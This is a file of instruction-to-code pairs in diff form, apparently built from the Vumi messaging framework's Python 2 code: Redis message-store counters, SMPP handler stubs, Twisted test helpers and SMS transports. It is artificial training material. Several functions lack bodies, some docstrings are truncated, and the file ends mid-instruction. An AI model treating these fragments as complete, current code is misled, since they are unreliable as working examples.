+ yield self.add_from_addr(batch_id, msg['from_addr'])
+[INST] Add a message key, weighted with the timestamp to the batch_id. [/INST] def add_inbound_message_key(self, batch_id, message_key, timestamp):
+ new_entry = yield self.redis.zadd(self.inbound_key(batch_id), **{
+ message_key.encode('utf-8'): timestamp,
+ })
+ if new_entry:
+ uses_counters = yield self.uses_counters(batch_id)
+ if uses_counters:
+ yield self.redis.incr(self.inbound_count_key(batch_id))
+ yield self.truncate_inbound_message_keys(batch_id)
+[INST] Add a count to all inbound message counters. (Used for recon.). [/INST] def add_inbound_message_count(self, batch_id, count):
+ yield self.redis.incr(self.inbound_count_key(batch_id), count)
+[INST] Add a from_addr to this batch_id using Redis's HyperLogLog
+functionality. Generally this information is set when
+`add_inbound_message()` is called.. [/INST] def add_from_addr(self, batch_id, from_addr):
+ return self.redis.pfadd(
+ self.from_addr_key(batch_id), from_addr.encode('utf-8'))
+[INST] Return count of the unique from_addrs in this batch. Note that the
+returned count is not exact.. [/INST] def count_from_addrs(self, batch_id):
+ return self.redis.pfcount(self.from_addr_key(batch_id))
+[INST] Return count of the unique to_addrs in this batch. Note that the
+returned count is not exact.. [/INST] def count_to_addrs(self, batch_id):
+ return self.redis.pfcount(self.to_addr_key(batch_id))
+[INST] Return the count of the unique inbound message keys for this batch_id. [/INST] def count_inbound_message_keys(self, batch_id):
+ if not (yield self.uses_counters(batch_id)):
+ returnValue((yield self.inbound_message_keys_size(batch_id)))
+ count = yield self.inbound_message_count(batch_id)
+ returnValue(count)
+[INST] Return the count of the unique outbound message keys for this batch_id. [/INST] def count_outbound_message_keys(self, batch_id):
+ if not (yield self.uses_counters(batch_id)):
+ returnValue((yield self.outbound_message_keys_size(batch_id)))
+ count = yield self.outbound_message_count(batch_id)
+ returnValue(count)
+[INST] Return the count of the unique event keys for this batch_id. [/INST] def count_event_keys(self, batch_id):
+ uses_event_counters = yield self.uses_event_counters(batch_id)
+ if uses_event_counters:
+ count = yield self.event_count(batch_id)
+ returnValue(count)
+ else:
+ count = yield self.redis.scard(self.event_key(batch_id))
+ returnValue(count)
+[INST] Calculate the number of messages seen in the last `sample_time` amount
+of seconds.. [/INST] def count_inbound_throughput(self, batch_id, sample_time=300):
+ last_seen = yield self.redis.zrange(
+ self.inbound_key(batch_id), 0, 0, desc=True,
+ withscores=True)
+ if not last_seen:
+ returnValue(0)
+ [(latest, timestamp)] = last_seen
+ count = yield self.redis.zcount(
+ self.inbound_key(batch_id), timestamp - sample_time, timestamp)
+ returnValue(int(count))
+[INST] Calculate the number of messages seen in the last `sample_time` amount
+of seconds.. [/INST] def count_outbound_throughput(self, batch_id, sample_time=300):
+ last_seen = yield self.redis.zrange(
+ self.outbound_key(batch_id), 0, 0, desc=True, withscores=True)
+ if not last_seen:
+ returnValue(0)
+ [(latest, timestamp)] = last_seen
+ count = yield self.redis.zcount(
+ self.outbound_key(batch_id), timestamp - sample_time, timestamp)
+ returnValue(int(count))
+[INST] Store the inbound query results for a query that was started with
+`start_inbound_query`. Internally this grabs the timestamps from
+the cache (there is an assumption that it has already been reconciled)
+and orders the results accordingly.. [/INST] def store_query_results(self, batch_id, token, keys, direction,
+ ttl=None):
+ ttl = ttl or self.DEFAULT_SEARCH_RESULT_TTL
+ result_key = self.search_result_key(batch_id, token)
+ if direction == 'inbound':
+ score_set_key = self.inbound_key(batch_id)
+ elif direction == 'outbound':
+ score_set_key = self.outbound_key(batch_id)
+ else:
+ raise MessageStoreCacheException('Invalid direction')
+ for key in keys:
+ timestamp = yield self.redis.zscore(score_set_key, key)
+ yield self.redis.zadd(result_key, **{
+ key.encode('utf-8'): timestamp,
+ })
+ yield self.redis.expire(result_key, ttl)
+ yield self.redis.srem(self.search_token_key(batch_id), token)
+[INST] Handle a delivery report PDU from the networks.
+
+All processors should implement this even if it does nothing.. [/INST] def handle_delivery_report_pdu(pdu_data):
+[INST] Handle an unpacked delivery report from the networks.
+This can happen with certain SMSCs that don't set the necessary
+delivery report flags on a PDU. As a result we only detect the DR by
+matching a received SM against a predefined regex.. [/INST] def handle_delivery_report_content(pdu_data):
+[INST] Handle a short message PDU from the networks after it has been
+re-assembled and decoded.
+
+
+
+All processors should implement this even if it does nothing.. [/INST] def handle_short_message_pdu(pdu):
+[INST] Handle a part of a multipart PDU.
+
+All processors should implement this even if it does nothing.. [/INST] def handle_multipart_pdu(pdu):
+[INST] Handle a USSD pdu.
+
+It is likely that the USSD bits of this Interface will move to
+its own Interface implementation once work starts on an USSD over
+SMPP implementation.
+
+All processors should implement this even if it does nothing.. [/INST] def handle_ussd_pdu(pdu):
+[INST] Decode a byte string and return the unicode string for it according
+to the specified data coding.. [/INST] def dcs_decode(obj, data_coding):
+[INST] Handle an outbound message from Vumi by calling the appropriate
+methods on the service with the appropriate parameters.
+
+These parameters and values can differ per MNO.
+
+Should return a Deferred that fires with a the list of sequence_numbers
+returning from the submit_sm calls.. [/INST] def handle_raw_outbound_message(vumi_message, smpp_service):
+[INST] Schedule a message delivery run.
+Returns a deferred that will fire when all deliverable
+messages have been delivered and processed by their consumers.
+This is useful for manually triggering a delivery run from
+inside a test.. [/INST] def kick_delivery(self):
+ if self._delivering is None:
+ self._delivering = {
+ 'deferred': Deferred(),
+ 'count': 0,
+ }
+ self._delivering['count'] += 1
+ reactor.callLater(0, self.deliver_to_channels)
+ return self.wait_delivery()
+[INST] Wait for the current message delivery run (if any) to finish.
+Returns a deferred that will fire when the broker is finished
+delivering any messages from the current run. This should not
+leave any messages undelivered, because basic_publish() kicks
+off a delivery run.
+
+Each call returns a new deferred to avoid callback chain ordering
+issues when several things want to wait for delivery.
+
+This method should be called during test teardown to make
+sure there are no pending delivery cleanups that will cause a
+dirty reactor race.. [/INST] def wait_delivery(self):
+ d = Deferred()
+ if self._delivering is None:
+ d.callback(None)
+ else:
+ self._delivering['deferred'].chainDeferred(d)
+ return d
+[INST] Notify the broker that a message has been processed, in order
+to make delivery sane.. [/INST] def message_processed(self):
+ self.broker.message_processed()
+[INST] Register cleanup and perform setup for a helper object.. [/INST] def add_helper(helper_object, *args, **kwargs):
+[INST] Mark a method as being suitable for automatic proxy generation.
+See :func:`generate_proxies` for usage.. [/INST] def proxyable(func):
+ func.proxyable = True
+ return func
+[INST] We can't necessarily use TestCase.successResultOf because our Twisted might
+not be new enough. This is a standalone copy with some minor message
+differences.. [/INST] def success_result_of(d):
+ results = []
+ d.addBoth(results.append)
+ if not results:
+ raise FailTest("No result available for deferred: %r" % (d,))
+ if isinstance(results[0], Failure):
+ raise FailTest("Expected success from deferred %r, got failure: %r" % (
+ d, results[0]))
+ return results[0]
+[INST] Poll the reactor for unclosed connections and wait for them to close.
+Properly waiting for all connections to finish closing requires hooking
+into :meth:`Protocol.connectionLost` in both client and server. Since
+this isn't practical in all cases, we check the reactor for any open
+connections and wait a bit for them to finish closing if we find any.
+
+This will only wait for connections that close on their own. Any
+connections that have been left open will stay open (unless they
+time out or something) and will leave the reactor dirty after we
+stop waiting.. [/INST] def _check_reactor_things(self):
+ from twisted.internet import reactor
+ yield deferLater(reactor, 0, lambda: None)
+ for i in range(self.reactor_check_iterations):
+ internal_readers = getattr(reactor, '_internalReaders', set())
+ selectables = set(reactor.getReaders() + reactor.getWriters())
+ if not (selectables - internal_readers):
+ return
+ yield deferLater(
+ reactor, self.reactor_check_interval, lambda: None)
+[INST] Register a cleanup function to be called at teardown time.. [/INST] def add_cleanup(self, func, *args, **kw):
+ if self._cleanup_funcs is None:
+ self._cleanup_funcs = []
+ self._cleanup_funcs.append((func, args, kw))
+[INST] Perform setup and register cleanup for the given helper object.. [/INST] def add_helper(self, helper_object, *args, **kw):
+ if not IHelper.providedBy(helper_object):
+ raise ValueError(
+ "Helper object does not provide the IHelper interface: %s" % (
+ helper_object,))
+ self.add_cleanup(helper_object.cleanup)
+ return maybe_async_return(
+ helper_object, helper_object.setup(*args, **kw))
+[INST] The only real difference between using this method and constructing a
+message object directly is that this method provides sensible defaults
+for most fields and sets the routing endpoint (if provided) in a more
+convenient way.
+
+The following parameters are mandatory.. [/INST] def make_user_message(self, content, from_addr, to_addr, group=None,
+ session_event=None, transport_type=DEFAULT,
+ transport_name=DEFAULT, transport_metadata=DEFAULT,
+ helper_metadata=DEFAULT, endpoint=DEFAULT, **kw):
+ if transport_type is DEFAULT:
+ transport_type = self.transport_type
+ if helper_metadata is DEFAULT:
+ helper_metadata = {}
+ if transport_metadata is DEFAULT:
+ transport_metadata = {}
+ if transport_name is DEFAULT:
+ transport_name = self.transport_name
+ msg = TransportUserMessage(
+ from_addr=from_addr,
+ to_addr=to_addr,
+ group=group,
+ transport_name=transport_name,
+ transport_type=transport_type,
+ transport_metadata=transport_metadata,
+ helper_metadata=helper_metadata,
+ content=content,
+ session_event=session_event,
+ **kw)
+ if endpoint is not DEFAULT:
+ msg.set_routing_endpoint(endpoint)
+ return msg
+[INST] Wait for any pending message deliveries and stop all workers.. [/INST] def cleanup(self):
+ yield self.broker.wait_delivery()
+ for worker in self._workers:
+ yield worker.stopWorker()
+[INST] Clean up a particular worker manually and remove it from the helper's
+cleanup list. This should only be called with workers that are already
+in the helper's cleanup list.. [/INST] def cleanup_worker(self, worker):
+ self._workers.remove(worker)
+ return worker.stopWorker()
+[INST] Clear all dispatched messages from the broker.. [/INST] def clear_all_dispatched(self):
+ self.broker.clear_messages('vumi')
+ self.broker.clear_messages('vumi.metrics')
+[INST] Wait for events dispatched to a connector.. [/INST] def wait_for_dispatched_events(self, amount=None, connector_name=None):
+ d = self._wait_for_dispatched(connector_name, 'event', amount)
+ d.addCallback(lambda msgs: [
+ TransportEvent(**msg.payload) for msg in msgs])
+ return d
+[INST] Wait for inbound messages dispatched to a connector.. [/INST] def wait_for_dispatched_inbound(self, amount=None, connector_name=None):
+ d = self._wait_for_dispatched(connector_name, 'inbound', amount)
+ d.addCallback(lambda msgs: [
+ TransportUserMessage(**msg.payload) for msg in msgs])
+ return d
+[INST] Wait for outbound messages dispatched to a connector.. [/INST] def wait_for_dispatched_outbound(self, amount=None, connector_name=None):
+ d = self._wait_for_dispatched(connector_name, 'outbound', amount)
+ d.addCallback(lambda msgs: [
+ TransportUserMessage(**msg.payload) for msg in msgs])
+ return d
+[INST] Wait for statuses dispatched to a connector.. [/INST] def wait_for_dispatched_statuses(self, amount=None, connector_name=None):
+ if connector_name is None:
+ connector_name = self._status_connector_name
+ d = self._wait_for_dispatched(connector_name, 'status', amount)
+ d.addCallback(lambda msgs: [
+ TransportStatus(**msg.payload) for msg in msgs])
+ return d
+[INST] Clear dispatched events for a connector.. [/INST] def clear_dispatched_events(self, connector_name=None):
+ return self._clear_dispatched(connector_name, 'event')
+[INST] Clear dispatched inbound messages for a connector.. [/INST] def clear_dispatched_inbound(self, connector_name=None):
+ return self._clear_dispatched(connector_name, 'inbound')
+[INST] Clear dispatched outbound messages for a connector.. [/INST] def clear_dispatched_outbound(self, connector_name=None):
+ return self._clear_dispatched(connector_name, 'outbound')
+[INST] Clear dispatched statuses for a connector.. [/INST] def clear_dispatched_statuses(self, connector_name=None):
+ if connector_name is None:
+ connector_name = self._status_connector_name
+ return self._clear_dispatched(connector_name, 'status')
+[INST] Dispatch a message to the specified routing key.. [/INST] def dispatch_raw(self, routing_key, message, exchange='vumi'):
+ self.broker.publish_message(exchange, routing_key, message)
+ return self.kick_delivery()
+[INST] Trigger delivery of messages by the broker.
+This is generally called internally by anything that sends a message.. [/INST] def kick_delivery(self):
+ return self.broker.kick_delivery()
+[INST] Get dispatched metrics after waiting for any pending deliveries.
+The list of datapoints from each dispatched metrics message is
+returned.. [/INST] def wait_for_dispatched_metrics(self):
+ return self.broker.wait_delivery().addCallback(
+ lambda _: self.get_dispatched_metrics())
+[INST] Clear dispatched metrics messages from the broker.. [/INST] def clear_dispatched_metrics(self):
+ self.broker.clear_messages('vumi.metrics')
+[INST] Construct and dispatch a delivery report event.
+This is a wrapper around :meth:`MessageHelper.make_delivery_report` (to
+which all parameters are passed) and. [/INST] def make_dispatch_delivery_report(self, *args, **kw):
+ msg = self.msg_helper.make_delivery_report(*args, **kw)
+ d = self.worker_helper.dispatch_event(msg)
+ return d.addCallback(lambda r: msg)
+[INST] Construct and dispatch a status.
+This is a wrapper around :meth:`MessageHelper.make_status` (to
+which all parameters are passed) and. [/INST] def make_dispatch_status(self, *args, **kw):
+ msg = self.msg_helper.make_status(*args, **kw)
+ d = self.worker_helper.dispatch_status(msg)
+ return d.addCallback(lambda r: msg)
+[INST] This is useful for skipping tests that require optional dependencies which
+might not be present.. [/INST] def import_skip(exc, *expected):
+ module = import_filter(exc, *expected)
+ raise SkipTest("Failed to import '%s'." % (module,))
+[INST] Decorate a test that should be skipped with a reason.
+NOTE: Don't import this as `skip`, because that will cause trial to skip
+the entire module that imports it.. [/INST] def skiptest(reason):
+ def skipdeco(func):
+ func.skip = reason
+ return func
+ return skipdeco
+[INST] Return ``value`` or a deferred that fires with it.
+This is useful in cases where we're performing a potentially async
+operation but don't necessarily have enough information to use
+`maybe_async`.. [/INST] def maybe_async_return(value, maybe_deferred):
+ if isinstance(maybe_deferred, Deferred):
+ return maybe_deferred.addCallback(lambda r: value)
+ return value
+[INST] Get a list of Riak managers and whether they should be purged.
+The return value is a list of (`bool`, `Manager`) tuples. If the first
+item is `True`, the manager should be purged. It's safe to purge
+managers even if the first item is `False`, but it adds extra cleanup
+time.. [/INST] def _get_riak_managers_for_cleanup(self):
+ seen_bucket_prefixes = set()
+ managers = []
+ for manager in self._riak_managers:
+ if manager.bucket_prefix in seen_bucket_prefixes:
+ managers.append((False, manager))
+ else:
+ seen_bucket_prefixes.add(manager.bucket_prefix)
+ managers.append((True, manager))
+ return reversed(managers)
+[INST] Get a list of Redis managers and whether they should be purged.
+The return value is a list of (`bool`, `Manager`) tuples. If the first
+item is `True`, the manager should be purged. It's safe to purge
+managers even if the first item is `False`, but it adds extra cleanup
+time.. [/INST] def _get_redis_managers_for_cleanup(self):
+ seen_key_prefixes = set()
+ managers = []
+ for manager in self._redis_managers:
+ if manager._key_prefix in seen_key_prefixes:
+ managers.append((False, manager))
+ else:
+ seen_key_prefixes.add(manager._key_prefix)
+ managers.append((True, manager))
+ return reversed(managers)
+[INST] This is a separate method to allow easy overriding.. [/INST] def _purge_redis(self, manager):
+ try:
+ yield manager._purge_all()
+ except RuntimeError, e:
+ if e.args[0] != 'Not connected':
+ raise
+[INST] Patch a Riak manager to capture load and store operations.. [/INST] def record_load_and_store(self, riak_manager, loads, stores):
+ orig_load = riak_manager.load
+ orig_store = riak_manager.store
+ def record_load(modelcls, key, result=None):
+ loads.append(key)
+ return orig_load(modelcls, key, result=result)
+ def record_store(obj):
+ stores.append(obj.key)
+ return orig_store(obj)
+ self._patch(riak_manager, "load", record_load)
+ self._patch(riak_manager, "store", record_store)
+[INST] All configs for things that create Riak or Redis clients should be
+passed through this method.. [/INST] def mk_config(self, config):
+ self._check_patches_applied()
+ config = config.copy()
+ config.update(self._config_overrides)
+ return config
+[INST] Transport-specific config validation happens in here.. [/INST] def validate_config(self):
+ self.web_path = self.config['web_path']
+ self.web_port = int(self.config['web_port'])
+ self.integrat_url = self.config['url']
+ self.integrat_username = self.config['username']
+ self.integrat_password = self.config['password']
+ self.transport_type = self.config.get('transport_type', 'ussd')
+[INST] Call .send_to() for a message from RapidSMS that is not a reply.
+This is for overriding by sub-classes that need to add additional
+message options.. [/INST] def send_rapidsms_nonreply(self, to_addr, content, config, endpoint):
+ return self.send_to(to_addr, content, endpoint=endpoint)
+[INST] Do any necessary computation when a field changes.. [/INST] def model_field_changed(self, modelobj, changed_field_name):
+ pass
+[INST] Perform a paginated index query for backlinked objects.. [/INST] def reverse_lookup_keys_paginated(self, modelobj, manager=None,
+ max_results=None, continuation=None):
+ if manager is None:
+ manager = modelobj.manager
+ return manager.index_keys_page(
+ self.model_cls, self.index_name, modelobj.key,
+ max_results=max_results, continuation=continuation)
+[INST] Publishes a status if it is not a repeat of the previously
+published status.. [/INST] def add_status(self, **kw):
+ if self.status_detect.check_status(**kw):
+ yield self.publish_status(**kw)
+[INST] Read outbound message and do what needs to be done with them.. [/INST] def handle_outbound_message(self, message):
+ request_id = message['in_reply_to']
+ request = self.get_request(request_id)
+ builder = self.infer_message_type(message)
+ wc_msg = builder(message)
+ if request is None or request.finished:
+ return self.push_message(wc_msg, message)
+ request.write(wc_msg.to_xml())
+ request.finish()
+ d = self.publish_ack(user_message_id=message['message_id'],
+ sent_message_id=message['message_id'])
+ wc_metadata = message["transport_metadata"].get('wechat', {})
+ if wc_metadata:
+ d.addCallback(lambda _: self.set_cached_reply(
+ wc_metadata['MsgId'], wc_msg.to_xml()))
+ if message['session_event'] == TransportUserMessage.SESSION_CLOSE:
+ d.addCallback(
+ lambda _: self.clear_addr_mask(wc_msg.to_user_name))
+ return d
+[INST] Construct a real webserver to test actual connectivity.. [/INST] def make_real_webserver(self):
+ root = Resource()
+ root.isLeaf = True
+ root.render = lambda r: self._render_request(r)
+ site_factory = Site(root)
+ webserver = yield reactor.listenTCP(
+ 0, site_factory, interface='127.0.0.1')
+ self.add_cleanup(webserver.loseConnection)
+ addr = webserver.getHost()
+ url = "http://%s:%s/" % (addr.host, addr.port)
+ returnValue(url)
+[INST] Wrapper around http_request_full and friends that injects our fake
+connection's agent.. [/INST] def with_agent(self, f, *args, **kw):
+ kw.setdefault('agent_class', self.fake_http.get_agent)
+ return f(*args, **kw)
+[INST] Called when an inbound transport user message is consumed.
+The other methods listed below all function in the same way. Only the
+kind and direction of the message being processed differs.. [/INST] def handle_consume_inbound(self, message, connector_name):
+ return self.handle_inbound(message, connector_name)
+[INST] Called when an inbound transport user message is published.. [/INST] def handle_publish_inbound(self, message, connector_name):
+ return self.handle_inbound(message, connector_name)
+[INST] Default handler for published and consumed inbound messages.. [/INST] def handle_inbound(self, message, connector_name):
+ return message
+[INST] Called when an outbound transport user message is consumed.. [/INST] def handle_consume_outbound(self, message, connector_name):
+ return self.handle_outbound(message, connector_name)
+[INST] Called when an outbound transport user message is published.. [/INST] def handle_publish_outbound(self, message, connector_name):
+ return self.handle_outbound(message, connector_name)
+[INST] Default handler for published and consumed outbound messages.. [/INST] def handle_outbound(self, message, connector_name):
+ return message
+[INST] Called when a transport event is consumed.. [/INST] def handle_consume_event(self, event, connector_name):
+ return self.handle_event(event, connector_name)
+[INST] Called when a transport event is published.. [/INST] def handle_publish_event(self, event, connector_name):
+ return self.handle_event(event, connector_name)
+[INST] Default handler for published and consumed events.. [/INST] def handle_event(self, event, connector_name):
+ return event
+[INST] Called when a failure message is consumed.. [/INST] def handle_consume_failure(self, failure, connector_name):
+ return self.handle_failure(failure, connector_name)
+[INST] Called when a failure message is published.. [/INST] def handle_publish_failure(self, failure, connector_name):
+ return self.handle_failure(failure, connector_name)
+[INST] Called to process a failure message (. [/INST] def handle_failure(self, failure, connector_name):
+ return failure
+[INST] Return a list of middleware objects created from a worker
+configuration.. [/INST] def create_middlewares_from_config(worker, config):
+ middlewares = []
+ for item in config.get("middleware", []):
+ keys = item.keys()
+ if len(keys) != 1:
+ raise ConfigError(
+ "Middleware items contain only a single key-value pair. The"
+ " key should be a name for the middleware. The value should be"
+ " the full dotted name of the class implementing the"
+ " middleware, or a mapping containing the keys 'class' with a"
+ " value of the full dotted class name, 'consume_priority' with"
+ " the priority level for consuming, and 'publish_priority'"
+ " with the priority level for publishing, both integers.")
+ middleware_name = keys[0]
+ middleware_config = config.get(middleware_name, {})
+ if isinstance(item[middleware_name], basestring):
+ cls_name = item[middleware_name]
+ middleware_config['consume_priority'] = 0
+ middleware_config['publish_priority'] = 0
+ elif isinstance(item[middleware_name], dict):
+ conf = item[middleware_name]
+ cls_name = conf.get('class')
+ try:
+ middleware_config['consume_priority'] = int(conf.get(
+ 'consume_priority', 0))
+ middleware_config['publish_priority'] = int(conf.get(
+ 'publish_priority', 0))
+ except ValueError:
+ raise ConfigError(
+ "Middleware priority level must be an integer")
+ else:
+ raise ConfigError(
+ "Middleware item values must either be a string with the",
+ " full dotted name of the class implementing the middleware,"
+ " or a dictionary with 'class', 'consume_priority', and"
+ " 'publish_priority' keys.")
+ cls = load_class_by_string(cls_name)
+ middleware = cls(middleware_name, middleware_config, worker)
+ middlewares.append(middleware)
+ return middlewares
+[INST] Add a pool to list of pools.. [/INST] def _register_pool(self, pool):
+ pool = self._encode(pool)
+ pool_list_key = self._pool_list_key()
+ yield self.redis.sadd(pool_list_key, pool)
+[INST] Remove a pool to list of pools.. [/INST] def _unregister_pool(self, pool):
+ pool = self._encode(pool)
+ pool_list_key = self._pool_list_key()
+ yield self.redis.srem(pool_list_key, pool)
+[INST] Generic response for abnormal server side errors.. [/INST] def response_for_error(self):
+ response = {
+ 'message': 'We encountered an error while processing your message',
+ 'type': 'end'
+ }
+ return response
+[INST] Called on requests that timed out.. [/INST] def finish_expired_request(self, request_id, request):
+ del self._requests[request_id]
+ log.msg('Timing out on response for %s' % request.session['from_addr'])
+ request.deferred.callback(self.response_for_error())
+[INST] Transport-specific config validation happens in here.. [/INST] def validate_config(self):
+ self.message_id_lifetime = self.config.get('message_id_lifetime',
+ self.DEFAULT_MESSAGE_ID_LIFETIME)
+ self.web_receipt_path = self.config['web_receipt_path']
+ self.web_receive_path = self.config['web_receive_path']
+ self.web_port = int(self.config['web_port'])
+ self.opera_url = self.config['url']
+ self.opera_channel = self.config['channel']
+ self.opera_password = self.config['password']
+ self.opera_service = self.config['service']
+ self.max_segments = self.config.get('max_segments', 9)
+ self.r_config = self.config.get('redis_manager', {})
+ self.transport_name = self.config['transport_name']
+[INST] Decide what to do on certain failure cases.. [/INST] def handle_outbound_message_failure(self, failure, message):
+ if failure.check(xmlrpc.Fault):
+ raise TemporaryFailure(failure)
+ elif failure.check(ValueError):
+ yield self.publish_nack(message['message_id'], str(failure.value))
+ raise PermanentFailure(failure)
+ else:
+ yield self.publish_nack(message['message_id'], str(failure.value))
+ raise failure
+[INST] Clean-up of setup done in setup_dispatcher should happen here.. [/INST] def teardown_dispatcher(self):
+ pass
+[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function(obj):
+ obj.a = obj.a + u"-modified"
+ return True
+[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function_deferred(obj):
+ from twisted.internet import reactor
+ return deferLater(reactor, 0.1, post_migrate_function, obj)
+[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function_new_only(obj):
+ if obj.was_migrated:
+ return post_migrate_function(obj)
+ return False
+[INST] Get the fully-qualified name of a thing.. [/INST] def fqpn(thing):
+ return ".".join([thing.__module__, thing.__name__])
+[INST] This is a drop in replacement for the original `http_request_full` method
+but it has its internals completely replaced by treq. Treq supports SNI
+and our implementation does not for some reason. Also, we do not want
+to continue maintaining this because we're favouring treq everywhere
+anyway.. [/INST] def http_request_full(url, data=None, headers={}, method='POST',
+ timeout=None, data_limit=None, context_factory=None,
+ agent_class=None, reactor=None):
+ agent_class = agent_class or Agent
+ if reactor is None:
+ from twisted.internet import reactor
+ kwargs = {'pool': HTTPConnectionPool(reactor, persistent=False)}
+ if context_factory is not None:
+ kwargs['contextFactory'] = context_factory
+ agent = agent_class(reactor, **kwargs)
+ client = HTTPClient(agent)
+ def handle_response(response):
+ return SimplishReceiver(response, data_limit).deferred
+ d = client.request(method, url, headers=headers, data=data)
+ d.addCallback(handle_response)
+ if timeout is not None:
+ cancelling_on_timeout = [False]
+ def raise_timeout(reason):
+ if not cancelling_on_timeout[0] or reason.check(HttpTimeoutError):
+ return reason
+ return Failure(HttpTimeoutError("Timeout while connecting"))
+ def cancel_on_timeout():
+ cancelling_on_timeout[0] = True
+ d.cancel()
+ def cancel_timeout(r, delayed_call):
+ if delayed_call.active():
+ delayed_call.cancel()
+ return r
+ d.addErrback(raise_timeout)
+ delayed_call = reactor.callLater(timeout, cancel_on_timeout)
+ d.addCallback(cancel_timeout, delayed_call)
+ return d
+[INST] Checks to see if the current status is a repeat. If it is, None is
+returned. If it isn't, the status is returned.. [/INST] def check_status(self, **status):
+ self._check_state(status['status'], status['component'])
+ if self._check_type(status['type'], status['component']):
+ return status
+[INST] Count keys in an index page, filtering by regex if necessary.. [/INST] def count_keys(self, keys, filter_regex):
+ if filter_regex is not None:
+ keys = [(v, k) for v, k in keys if filter_regex.match(v)]
+ return len(keys)
+[INST] Perform an index query to get all keys and count them.. [/INST] def count_all_keys(self):
+ self.emit("Counting all keys ...")
+ index_page = yield self.model.all_keys_page(
+ max_results=self.options["index-page-size"])
+ yield self.count_pages(index_page, filter_regex=None)
+[INST] Perform an index query to get all matching keys and count them.. [/INST] def count_index_keys(self):
+ filter_regex = self.options["index-value-regex"]
+ if filter_regex is not None:
+ filter_regex = re.compile(filter_regex)
+ self.emit("Counting ...")
+ index_page = yield self.model.index_keys_page(
+ field_name=self.options["index-field"],
+ value=self.options["index-value"],
+ end_value=self.options["index-value-end"],
+ max_results=self.options["index-page-size"],
+ return_terms=True)
+ yield self.count_pages(index_page, filter_regex=filter_regex)
+[INST] handle messages arriving over AMQP meant for delivery via vas2nets. [/INST] def handle_outbound_message(self, message):
+ params = {
+ 'username': self.config['username'],
+ 'password': self.config['password'],
+ 'owner': self.config['owner'],
+ 'service': self.config['service'],
+ }
+ v2n_message_id = message.get('in_reply_to')
+ if v2n_message_id is not None:
+ if v2n_message_id.startswith(self.transport_name):
+ v2n_message_id = v2n_message_id[len(self.transport_name) + 1:]
+ else:
+ v2n_message_id = message['message_id']
+ message_params = {
+ 'call-number': normalize_outbound_msisdn(message['to_addr']),
+ 'origin': message['from_addr'],
+ 'messageid': v2n_message_id,
+ 'provider': message['transport_metadata']['network_id'],
+ 'tariff': message['transport_metadata'].get('tariff', 0),
+ 'text': validate_characters(message['content']),
+ 'subservice': self.config.get('subservice',
+ message['transport_metadata'].get(
+ 'keyword', '')),
+ }
+ params.update(message_params)
+ log.msg('Hitting %s with %s' % (self.config['url'], params))
+ log.msg(urlencode(params))
+ try:
+ response = yield http_request_full(
+ self.config['url'], urlencode(params), {
+ 'User-Agent': ['Vumi Vas2Net Transport'],
+ 'Content-Type': ['application/x-www-form-urlencoded'],
+ }, 'POST', agent_class=self.agent_factory)
+ except ConnectionRefusedError:
+ log.msg("Connection failed sending message:", message)
+ raise TemporaryFailure('connection refused')
+ log.msg('Headers', list(response.headers.getAllRawHeaders()))
+ header = self.config.get('header', 'X-Nth-Smsid')
+ if response.code != 200:
+ raise PermanentFailure('server error: HTTP %s: %s'
+ % (response.code, response.delivered_body))
+ if response.headers.hasHeader(header):
+ transport_message_id = response.headers.getRawHeaders(header)[0]
+ yield self.publish_ack(
+ user_message_id=message['message_id'],
+ sent_message_id=transport_message_id,
+ )
+ else:
+ err_msg = 'No SmsId Header, content: %s' % response.delivered_body
+ yield self.publish_nack(
+ user_message_id=message['message_id'],
+ sent_message_id=message['message_id'],
+ reason=err_msg)
+ raise Vas2NetsTransportError(err_msg)
+[INST] Store this failure in redis, with an optional retry delay.. [/INST] def store_failure(self, message, reason, retry_delay=None):
+ message_json = message
+ if not isinstance(message, basestring):
+ message_json = to_json(message)
+ key = self.failure_key()
+ if not retry_delay:
+ retry_delay = 0
+ yield self.redis.hmset(key, {
+ "message": message_json,
+ "reason": reason,
+ "retry_delay": str(retry_delay),
+ })
+ yield self.add_to_failure_set(key)
+ if retry_delay:
+ yield self.store_retry(key, retry_delay)
+ returnValue(key)
+[INST] Handle a failed message from a transport.. [/INST] def handle_failure(self, message, failure_code, reason):
+ if failure_code == FailureMessage.FC_TEMPORARY:
+ return self.do_retry(message, reason)
+ else:
+ return self.store_failure(message, reason)
+[INST] Asserts that the JSON response we're getting back is the same as
+the list of messages provided.
+
+There are easier ways to do this by comparing bigger JSON blogs
+but then debugging the huge strings would be a pain.. [/INST] def assertJSONResultEqual(self, json_blob, messages):
+ dictionaries = json.loads(json_blob)
+ self.assertEqual(len(dictionaries), len(messages),
+ 'Unequal amount of dictionaries and messages')
+ for dictionary, message in zip(dictionaries, messages):
+ self.assertEqual(
+ TransportUserMessage(_process_fields=False, **message.payload),
+ TransportUserMessage.from_json(json.dumps(dictionary)))
+[INST] Wait zero seconds to give the reactor a chance to work.
+Returns its (optional) argument, so it's useful as a callback.. [/INST] def wait0(r=None):
+ from twisted.internet import reactor
+ return deferLater(reactor, 0, lambda: r)
+[INST] Write some bytes and allow the reactor to send them.. [/INST] def write(self, data):
+ self.transport.write(data)
+ return wait0()
+[INST] Get an endpoint that connects clients to this server.. [/INST] def endpoint(self):
+ return FakeServerEndpoint(self)
+[INST] Wait for a client to start connecting, and then return a. [/INST] def await_connection(self):
+ return self.connection_queue.get()
+[INST] Wait for a client to finish connecting.. [/INST] def await_connected(self):
+ return self._connected_d
+[INST] Wait for the both sides of the connection to close.. [/INST] def await_finished(self):
+ return self._finished_d
+[INST] Patch the protocol's makeConnection and connectionLost methods to make the
+protocol and its transport behave more like what `Agent` expects.
+
+While `Agent` is the driving force behind this, other clients and servers
+will no doubt have similar requirements.. [/INST] def patch_protocol_for_agent(protocol):
+ old_makeConnection = protocol.makeConnection
+ old_connectionLost = protocol.connectionLost
+ def new_makeConnection(transport):
+ patch_transport_fake_push_producer(transport)
+ patch_transport_abortConnection(transport, protocol)
+ return old_makeConnection(transport)
+ def new_connectionLost(reason):
+ if protocol._fake_connection_aborted and reason.check(ConnectionDone):
+ reason = Failure(ConnectionAborted())
+ return old_connectionLost(reason)
+ protocol.makeConnection = new_makeConnection
+ protocol.connectionLost = new_connectionLost
+ protocol._fake_connection_aborted = False
+[INST] Patch a method onto an object if it isn't already there.. [/INST] def patch_if_missing(obj, name, method):
+ setattr(obj, name, getattr(obj, name, method))
+[INST] Patch the three methods belonging to IPushProducer onto the transport if it
